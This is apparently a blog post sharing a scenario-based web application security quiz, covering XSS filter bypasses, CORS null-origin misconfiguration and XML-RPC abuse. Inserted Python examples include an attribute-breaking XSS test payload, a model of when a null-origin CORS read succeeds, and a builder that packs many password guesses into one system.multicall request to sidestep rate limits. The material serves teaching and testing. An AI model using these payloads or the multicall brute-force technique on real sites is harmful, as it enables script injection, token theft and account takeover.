Brain Storming: Quiz-1(Web App)

Hi,

Hope you guys are doing well. Today, while going through my old mails, I came across the theoretical Web App Security Quiz which I created last year while working at my old company. Although it's been more than one year, the questions are still worth giving a shot. That's why I thought I'd share it with others.

Rules: There are no rules, which means you are free to use the internet to search for answers, but in the end it's totally up to you to test your knowledge and skills. Try to finish the quiz within 15 minutes.

Note: The questions are scenario-based and theoretical; take your time to think and then write down your answers. If you want to discuss anything or have any issue, please feel free to ask.

Questions:

1) User-supplied data is reflected on a page inside the value attribute of an input tag, and on that page HTML entity encoding (htmlentities() with its default settings) is used to mitigate XSS. Is it possible to perform XSS here? Explain your answer (i.e. why and how).

<input type='text' value='user supplied data'>
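To make the scenario concrete, here is an added example (not part of the original quiz): a Python model of PHP's htmlentities() under its two relevant flag sets, reflected into the single-quoted value attribute shown above and parsed back with the standard-library HTML parser. It assumes "HTML Entities with its default settings" refers to PHP's htmlentities(), whose default flags were ENT_COMPAT | ENT_HTML401 before PHP 8.1 and ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML401 from 8.1 on. The payload string is constructed for the demonstration.

```python
# Added example (not part of the quiz): PHP htmlentities() flag behaviour modelled in
# Python, reflected into the quiz's single-quoted value attribute and parsed back.
from html.parser import HTMLParser

# Characters htmlentities() encodes for ASCII input under each flag set.
ENT_COMPAT = {"&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;"}  # default before PHP 8.1
ENT_QUOTES = {**ENT_COMPAT, "'": "&#039;"}                           # default since PHP 8.1


def htmlentities(data: str, table: dict = ENT_COMPAT) -> str:
    """Encode like htmlentities(): '&' first, so entities already in the input are not mangled."""
    out = data.replace("&", "&amp;")
    for ch, ent in table.items():
        if ch != "&":
            out = out.replace(ch, ent)
    return out


def render_input(data: str, table: dict = ENT_COMPAT) -> str:
    """The quiz's template: user data lands inside a single-quoted value attribute."""
    return f"<input type='text' value='{htmlentities(data, table)}'>"


class _AttrCollector(HTMLParser):
    """Collects (attribute, value) pairs of every start tag, as a browser's tokenizer sees them."""

    def __init__(self):
        super().__init__()
        self.attrs = []

    def handle_starttag(self, tag, attrs):
        self.attrs.extend(attrs)


def parsed_attributes(markup: str) -> list:
    parser = _AttrCollector()
    parser.feed(markup)
    parser.close()
    return parser.attrs


def event_handlers_injected(markup: str) -> list:
    """Names of on* attributes the parser finds; a correctly encoded reflection yields none."""
    return [name for name, _ in parsed_attributes(markup) if name.startswith("on")]


if __name__ == "__main__":
    payload = "' onfocus='alert(1)' autofocus='"   # constructed test input
    for label, table in (("ENT_COMPAT (pre-8.1 default)", ENT_COMPAT),
                         ("ENT_QUOTES (8.1+ default)", ENT_QUOTES)):
        markup = render_input(payload, table)
        print(label, "->", markup)
        print("   attributes:", parsed_attributes(markup))
        print("   handlers injected:", event_handlers_injected(markup))
```

The only difference between the two tables is whether the single quote is encoded; compare the attribute lists the parser returns for each, and note that a double-quote payload stays inside the attribute under both tables.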

2) What is the cookie SameSite attribute? What is the benefit of using it in a web application?

3) In a web application there is a directory named /admin/. It can be accessed from only one place, i.e. when the user logs in from the web server console; if the user tries to access it from any other location, a 403 error is displayed. This restriction is implemented by whitelisting the IP address of the web server console in the .htaccess file. If no other vulnerabilities such as directory listing, file upload, etc. exist, is it possible for an attacker to access that directory from a different location? Explain your answer.

4) There is an application which uses Akamai services, and XSS is properly mitigated in this application by input validation and output encoding. In addition, the "X-Originating-IP", "X-Forwarded-For", "X-Remote-IP" and "X-Remote-Addr" headers are disabled on the server. There is a section named "User Log" in the application which displays the IP address of the computer that was used to access the application. The developer left this section without any XSS protection, as he thought none was needed. Is it possible to exploit XSS in this section? Explain your answer.

5) Write an XSS payload that works when parentheses (), backticks ` and pseudo-protocols are blocked.

6) Is it possible to perform a "Two-Way CSRF Attack"? Give a scenario to support your answer.

7) An application has CORS-related request and response headers in the following fashion:

Request: 
Origin: null

Response: 
Access-Control-Allow-Origin: null 
Access-Control-Allow-Credentials: true

After authentication, a sensitive token is sent by the application in its response. Is it possible to steal it by exploiting the CORS configuration shown above? If yes, then explain your answer.
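An added example (not part of the original quiz) that models both halves of the exchange above in Python: the server emitting exactly the headers shown when the Origin is "null", a hardened allowlist variant, and the check a browser applies before letting page script read a credentialed cross-origin response. The allowlisted origin https://app.example is hypothetical. It assumes the attacker can make the victim's browser send Origin: null, which browsers do from sandboxed iframes, data: URLs and file: pages; how such a page is built is outside the snippet.

```python
# Added example (not part of the quiz): server-side CORS decisions and the browser's
# CORS check, so the effect of answering "Origin: null" with credentials is visible.
from typing import Dict, Optional

ALLOWED_ORIGINS = {"https://app.example"}  # hypothetical trusted origin for the hardened variant


def cors_headers_quiz(origin: Optional[str]) -> Dict[str, str]:
    """The quiz's configuration as shown: a request carrying the literal Origin 'null'
    gets it echoed back together with Access-Control-Allow-Credentials: true.
    Other origins are not shown in the quiz, so they get nothing here."""
    if origin == "null":
        return {
            "Access-Control-Allow-Origin": "null",
            "Access-Control-Allow-Credentials": "true",
        }
    return {}


def cors_headers_allowlist(origin: Optional[str]) -> Dict[str, str]:
    """Hardened variant: exact match against a fixed allowlist. 'null' is never allowlisted,
    because every sandboxed iframe, data: URL and file: page shares that origin."""
    if origin in ALLOWED_ORIGINS:
        return {
            "Access-Control-Allow-Origin": origin,
            "Access-Control-Allow-Credentials": "true",
            "Vary": "Origin",  # keep caches from serving one origin's headers to another
        }
    return {}


def browser_exposes_response(origin: str, headers: Dict[str, str],
                             with_credentials: bool = True) -> bool:
    """Model of the browser's CORS check on a cross-origin response:
    - Access-Control-Allow-Origin must equal the request's serialized origin, or be '*'
      for requests made without credentials;
    - credentialed requests (cookies, Authorization) additionally need
      Access-Control-Allow-Credentials: true and reject '*'.
    The serialized origin of a sandboxed iframe or data: page is the string 'null', so a
    server that echoes 'null' passes the equality test like any other reflected origin."""
    acao = headers.get("Access-Control-Allow-Origin")
    if acao is None:
        return False
    if acao == "*":
        return not with_credentials
    if acao != origin:
        return False
    if with_credentials and headers.get("Access-Control-Allow-Credentials") != "true":
        return False
    return True


def attacker_can_read_token(origin: str, cors_policy) -> bool:
    """Would JavaScript running with `origin` get to read a credentialed response under `cors_policy`?"""
    return browser_exposes_response(origin, cors_policy(origin), with_credentials=True)


if __name__ == "__main__":
    for policy in (cors_headers_quiz, cors_headers_allowlist):
        for origin in ("https://app.example", "https://attacker.example", "null"):
            print(f"{policy.__name__:22} Origin: {origin:26} "
                  f"readable={attacker_can_read_token(origin, policy)}")
```

The check is a plain string comparison, which is why "null" deserves no special trust: it is the one origin value an attacker can obtain on demand.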

8) What is the benefit of exploiting XML-RPC with the "system.multicall" method?
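An added example (not part of the original quiz) showing, with Python's standard xmlrpc.client and no network access, what system.multicall packs into a single HTTP request and how the per-call results come back. It assumes a WordPress-style endpoint exposing wp.getUsersBlogs(username, password); the password list and the server reply are constructed here, and the 403 / "Incorrect username or password." fault values are illustrative.

```python
# Added example (not part of the quiz): what system.multicall packs into one request
# and how per-call results come back, using only the standard library and no network.
import xmlrpc.client

METHOD = "wp.getUsersBlogs"  # assumption: WordPress-style endpoint; params are (username, password)


def build_multicall(username: str, passwords: list) -> str:
    """One XML-RPC request body carrying one wp.getUsersBlogs call per password guess.
    A rate limiter or WAF that counts HTTP requests or POSTs to the endpoint sees exactly one."""
    calls = [{"methodName": METHOD, "params": [username, pw]} for pw in passwords]
    return xmlrpc.client.dumps((calls,), methodname="system.multicall")


def count_calls(body: str) -> int:
    """Number of individual method calls packed into a multicall body."""
    (calls,), method = xmlrpc.client.loads(body)
    if method != "system.multicall":
        raise ValueError(f"not a multicall request: {method}")
    return len(calls)


def sample_response(passwords: list, correct: str) -> str:
    """Constructed server reply for the demo. Per the multicall convention each element is
    either a one-element array holding the call's return value or a struct with
    faultCode/faultString; the 403 code and message are illustrative values."""
    results = []
    for pw in passwords:
        if pw == correct:
            results.append([[{"blogid": "1", "blogName": "demo", "isAdmin": True}]])
        else:
            results.append({"faultCode": 403, "faultString": "Incorrect username or password."})
    return xmlrpc.client.dumps((results,), methodresponse=True)


def parse_multicall_response(xml: str, passwords: list) -> dict:
    """Map each guess to ('ok', value) or ('fault', code, message); results arrive in request order."""
    (results,), _ = xmlrpc.client.loads(xml)
    outcome = {}
    for pw, result in zip(passwords, results):
        if isinstance(result, dict) and "faultCode" in result:
            outcome[pw] = ("fault", result["faultCode"], result.get("faultString", ""))
        else:
            outcome[pw] = ("ok", result[0])
    return outcome


def successful_guesses(outcome: dict) -> list:
    return [pw for pw, result in outcome.items() if result[0] == "ok"]


if __name__ == "__main__":
    guesses = ["123456", "password", "Summer2019!"]   # constructed list
    body = build_multicall("admin", guesses)
    print(f"{count_calls(body)} login attempts in one request, {len(body)} bytes")
    reply = sample_response(guesses, correct="Summer2019!")
    print(successful_guesses(parse_multicall_response(reply, guesses)))
```

Because every inner call is answered individually, the attacker still learns which guess worked; the only thing the bundling removes is the per-request cost that lockout and rate-limiting logic usually keys on.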

9) Name any attack that can be performed by exploiting the "pingback.ping" method in XML-RPC.

10) If user-supplied data is reflected inside a page served with "Content-Type: text/xml", how would you perform XSS in such a scenario?

These questions are related to scenarios I faced while testing applications or are taken from the blogs of other security researchers (kudos to them for sharing their work!). Once you are done answering the questions, you can either send them to me for validation or use Google to find the correct answers.

Remain curious & keep learning. All the best!


Jaya Ram Kumar Pothi CISSP

Chief Executive Consultant @ Briskinfosec-IT Security, Information Security & Cyber security Consulting

6 years ago

If you published the answers in a new article, it would get you more views and it would be useful for many.


More articles by Utkarsh Tiwari

  • Internal IP/ Host Name Disclosure In Server Redirects
  • Brain Storming: Quiz-1(Web App) Solution
  • Exploiting Misconfigured Cross Origin Resource Sharing
  • It's all about fuzzing!
  • Host Header Injection In Depth
  • Photography
